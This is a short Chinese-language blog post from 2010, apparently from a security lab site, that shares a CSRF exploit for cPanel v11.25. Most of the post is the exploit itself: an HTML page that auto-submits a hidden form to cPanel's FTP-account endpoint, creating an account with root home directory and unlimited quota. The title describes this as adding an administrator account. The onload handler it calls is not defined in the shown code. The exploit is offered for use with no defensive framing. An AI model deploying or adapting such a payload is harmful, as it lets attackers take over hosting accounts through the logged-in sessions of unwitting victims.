【Exp】Cpanel v11.25 CSRF 添加管理员账号exp

2010-07-05

老系统内容 EXP 管理账号

约 102 字预计阅读 1 分钟

文章目录

Cpanel v11.25 CSRF 添加管理员账号漏洞。
Exploite:

<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="http://server:2082/frontend/x3/ftp/doaddftp.html">
<input type="hidden" name="login" value="name"/>
<input type="hidden" name="password" value="pass"/>
<input type="hidden" name="password2" value="pass"/>
<input type="hidden" name="homedir" value="/"/>
<input type="hidden" name="quota" value="unlimited"/>
</form>
</body>
</html>

发布作者：G0D-F4Th3r ,由黑小子整理编辑
影响版本：V 11.25
官方地址：http://www.cpanel.net/

文章作者 Nuclear'Atk

上次更新 2010-07-05

许可协议 Nuclear'Atk（核攻击）网络安全实验室版权所有，转载请注明出处。